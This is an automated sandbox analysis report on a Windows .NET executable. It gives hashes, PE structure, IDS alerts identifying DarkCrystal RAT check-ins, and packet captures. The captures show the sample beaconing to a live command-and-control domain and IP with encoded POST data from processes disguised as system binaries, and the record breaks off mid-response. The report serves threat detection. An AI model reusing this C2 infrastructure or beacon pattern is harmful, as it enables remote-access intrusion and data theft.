SSDEEP:	3:VLV993J+miJWEoJ8FXaTX9QtDWrzMAqrPK9AqNrv:Vx993DEURR3rzMAL9Ac
MD5:	9CE789EA3D5E8D6312039779DBCB75AA
SHA1:	16DCBC5AED8EDDB5D3E02EEFC524B785F35A13D4
SHA-256:	FB0BD3508200F0E14667216DE281C85F5F568B206623DC4F5182EC9A47676494
SHA-512:	1B0A688D0966495B281A0B3FBC92C36E3FB22C1C376437CF1B1F76FE178923DA7D8DDF7BECB0F090BCE5FB9F8DAFC4C1FE136DAFABAE71FCCA2F81BB03925549
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 21:13:00..21:13:00, error: 0x800705B4.21:13:06, error: 0x800705B4.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.569672649447316
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	VIyu4dC9CU.exe
File size:	2'023'936 bytes
MD5:	54eff01605da5e7cbdb382c98ece2c2a
SHA1:	be2ecfc24603a5e282bdfbb7780a03c1410879b8
SHA256:	26bda6e083db3a3c3ccaf29434850d91bbb9e10c48886a6f6a06bbf6c183448d
SHA512:	dd00705fb9741c6400145e2433af42605264a95e4c1fe44ee1579ac464463f9b493d8bdef98af4a5b03d717cd79357674cc09e5b8780c4ffe31a9704b08c89d0
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
TLSH:	DA95AE1E16924E37C2741B314876403E63E5D7363AA2EB4A361F24E26C037B5CA736B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5ef9be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675DE2B4 [Sat Dec 14 19:55:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1ef970	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f0000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1f2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1ed9c4	0x1eda00	3b02304c79cc9477167905d49e474840	False	0.7880520582742466	data	7.572941728975947	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1f0000	0x320	0x400	6600cbb6a430800013f2a673f3431cd2	False	0.349609375	data	2.6430868172484443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1f2000	0xc	0x200	a733b62215702e2f8a4e564789a7f0a9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1f0058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T01:07:16.895856+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49744	172.67.220.198	80	TCP
2025-01-12T01:07:23.489578+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49785	172.67.220.198	80	TCP
2025-01-12T01:07:48.739706+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49919	172.67.220.198	80	TCP
2025-01-12T01:07:57.239784+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49961	172.67.220.198	80	TCP
2025-01-12T01:08:01.739768+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49974	172.67.220.198	80	TCP
2025-01-12T01:08:28.346607+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49975	172.67.220.198	80	TCP
2025-01-12T01:08:36.802357+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49976	172.67.220.198	80	TCP
2025-01-12T01:09:01.161834+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49977	172.67.220.198	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 01:07:16.400630951 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:16.405575991 CET	80	49744	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:16.405692101 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:16.406672001 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:16.411534071 CET	80	49744	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:16.757674932 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:16.762689114 CET	80	49744	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:16.849594116 CET	80	49744	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:16.895855904 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:17.094655037 CET	80	49744	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:17.145833969 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:17.667602062 CET	49744	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:22.951323032 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:22.956284046 CET	80	49785	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:22.956373930 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:22.956927061 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:22.961745024 CET	80	49785	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:23.302536011 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:23.307465076 CET	80	49785	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:23.400444984 CET	80	49785	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:23.489578009 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:23.634957075 CET	80	49785	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:23.692737103 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:24.476356983 CET	49785	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:47.975682020 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:48.124777079 CET	80	49919	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:48.126032114 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:48.126470089 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:48.132121086 CET	80	49919	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:48.475025892 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:48.479842901 CET	80	49919	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:48.581496954 CET	80	49919	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:48.739706039 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:48.814454079 CET	80	49919	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:49.036731958 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:49.751666069 CET	49919	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:56.652564049 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:56.658972979 CET	80	49961	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:56.659049034 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:56.659665108 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:56.665685892 CET	80	49961	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:57.005796909 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:57.011363983 CET	80	49961	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:57.126224041 CET	80	49961	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:57.239784002 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:57.373271942 CET	80	49961	172.67.220.198	192.168.2.7
Jan 12, 2025 01:07:57.554305077 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:07:58.101773024 CET	49961	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.220379114 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.225514889 CET	80	49974	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:01.225622892 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.226008892 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.230858088 CET	80	49974	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:01.584486008 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.589425087 CET	80	49974	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:01.670216084 CET	80	49974	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:01.739768028 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:01.908375978 CET	80	49974	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:01.998853922 CET	49974	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:27.832804918 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:27.837915897 CET	80	49975	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:27.837995052 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:27.838195086 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:27.843081951 CET	80	49975	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:28.193239927 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:28.198288918 CET	80	49975	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:28.295558929 CET	80	49975	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:28.346606970 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:28.530555964 CET	80	49975	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:28.583619118 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:28.606230974 CET	49975	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.304435968 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.309390068 CET	80	49976	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:36.309469938 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.309705973 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.314515114 CET	80	49976	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:36.662116051 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.667067051 CET	80	49976	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:36.753104925 CET	80	49976	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:36.802356958 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:36.994132996 CET	80	49976	172.67.220.198	192.168.2.7
Jan 12, 2025 01:08:37.039021015 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:08:37.070430994 CET	49976	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:00.657906055 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:00.662765980 CET	80	49977	172.67.220.198	192.168.2.7
Jan 12, 2025 01:09:00.663089037 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:00.663089037 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:00.667979002 CET	80	49977	172.67.220.198	192.168.2.7
Jan 12, 2025 01:09:01.021403074 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:01.026283979 CET	80	49977	172.67.220.198	192.168.2.7
Jan 12, 2025 01:09:01.107140064 CET	80	49977	172.67.220.198	192.168.2.7
Jan 12, 2025 01:09:01.161834002 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:01.333620071 CET	80	49977	172.67.220.198	192.168.2.7
Jan 12, 2025 01:09:01.380572081 CET	49977	80	192.168.2.7	172.67.220.198
Jan 12, 2025 01:09:01.399910927 CET	49977	80	192.168.2.7	172.67.220.198

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 01:07:16.279900074 CET	64046	53	192.168.2.7	1.1.1.1
Jan 12, 2025 01:07:16.375525951 CET	53	64046	1.1.1.1	192.168.2.7
Jan 12, 2025 01:07:30.088881016 CET	55480	53	192.168.2.7	1.1.1.1
Jan 12, 2025 01:07:30.155122042 CET	53	55480	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 01:07:16.279900074 CET	192.168.2.7	1.1.1.1	0xe6c0	Standard query (0)	480344cm.renyash.ru	A (IP address)	IN (0x0001)	false
Jan 12, 2025 01:07:30.088881016 CET	192.168.2.7	1.1.1.1	0x109c	Standard query (0)	480344cm.renyash.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 01:07:16.375525951 CET	1.1.1.1	192.168.2.7	0xe6c0	No error (0)	480344cm.renyash.ru	172.67.220.198	A (IP address)	IN (0x0001)	false
Jan 12, 2025 01:07:16.375525951 CET	1.1.1.1	192.168.2.7	0xe6c0	No error (0)	480344cm.renyash.ru	104.21.38.84	A (IP address)	IN (0x0001)	false
Jan 12, 2025 01:07:30.155122042 CET	1.1.1.1	192.168.2.7	0x109c	No error (0)	480344cm.renyash.ru	104.21.38.84	A (IP address)	IN (0x0001)	false
Jan 12, 2025 01:07:30.155122042 CET	1.1.1.1	192.168.2.7	0x109c	No error (0)	480344cm.renyash.ru	172.67.220.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

480344cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49744	172.67.220.198	80	4828	C:\Recovery\ctfmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:07:16.406672001 CET	314	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:07:16.757674932 CET	344	OUT	Data Raw: 00 00 01 00 06 08 01 0a 05 06 02 01 02 03 01 0b 00 0b 05 00 02 0c 03 08 07 06 0d 06 04 02 03 02 0d 02 05 0a 02 56 06 55 0b 01 06 53 05 03 05 06 05 00 0d 0c 0f 00 07 0b 06 02 05 02 07 02 04 09 00 56 0f 01 07 53 04 07 0c 04 0b 0f 0f 03 0d 06 07 53 Data Ascii: VUSVSS\L~AhcfwLmOuvoSkobY`BQYkpw^ol\|_oci_kS\|Cw^tN}e~V@z}Prq
Jan 12, 2025 01:07:16.849594116 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:07:17.094655037 CET	1019	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:07:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHiSExB2QWeaJ5eaD9B4akOSg6ImQ1nNSmVF7GDB1FiChDUeO0BOLGff67iin%2FuMk1OdiPEFsSlDKAcaOJR5plCeg81O%2FpwpwgxeWe9G46z%2FQcHZSxezuD2PqaBmbtzuYmpZeL%2B8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e7ca09784259-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4757&min_rtt=1594&rtt_var=6923&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=658&delivery_rate=54279&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49785	172.67.220.198	80	7872	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:07:22.956927061 CET	350	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:07:23.302536011 CET	344	OUT	Data Raw: 00 03 04 01 06 0e 01 04 05 06 02 01 02 00 01 00 00 05 05 08 02 01 03 08 03 01 0f 0d 07 04 03 50 0d 03 04 00 03 06 05 03 0c 50 02 00 05 00 05 03 04 07 0d 0f 0d 57 01 02 04 05 04 51 04 05 07 01 03 0b 0d 09 04 0f 05 06 0e 03 0e 00 0a 0c 0c 03 05 50 Data Ascii: PPWQPSXPUQU\L}RsztLrXwf\|AoeMtR]c^Dx\|ol`v}nkPwwZi_~V@xCnA~bq
Jan 12, 2025 01:07:23.400444984 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:07:23.634957075 CET	1020	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:07:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlzlWj79i8TZLKboIG%2BEPRZFperCAJT5R2dKtt6Y0JbC9V%2FP8LrERrfejQ0dvaR9Y1Vf9TjxBZu51X1%2BF2ks1roI1MVz3klIEiE3m3VX9fhnhM69mWbKWxLyIAnMfHtuZD3TJv5S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e7f2fc907271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4688&min_rtt=2008&rtt_var=6113&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=694&delivery_rate=62257&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49919	172.67.220.198	80	2964	C:\Users\user\Desktop\VIyu4dC9CU.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:07:48.126470089 CET	367	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:07:48.475025892 CET	344	OUT	Data Raw: 05 01 04 07 06 0c 04 06 05 06 02 01 02 07 01 0a 00 07 05 0c 02 04 03 0b 02 00 0c 07 04 05 01 50 0a 04 07 59 01 54 06 50 0d 01 02 01 00 02 05 51 06 0b 0c 01 0a 03 07 05 06 00 03 00 05 52 00 00 05 07 0c 0b 00 07 06 06 0f 0f 0f 05 0c 05 0b 04 02 04 Data Ascii: PYTPQRUU\L~`rNtrSOvep\|~^tls^~p\|Jy{KxN}^h~pt^Zj_~V@Azmf}r}
Jan 12, 2025 01:07:48.581496954 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:07:48.814454079 CET	1016	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:07:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJc5wj2lfMoD8DpFgmKY48ElFhTe4WtGVt2ZPWvDtEgz52d08YbEOQpGC0MhBsJBTGJYJbRUDpkf959cdiHfoEGcXB7rVnFXvgJEUJ7JfV%2FFnjaU4MbTN9ZhHQ5qMtxFGyWOHVSm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e8905a018ccc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3708&min_rtt=1948&rtt_var=4251&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=711&delivery_rate=91079&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" 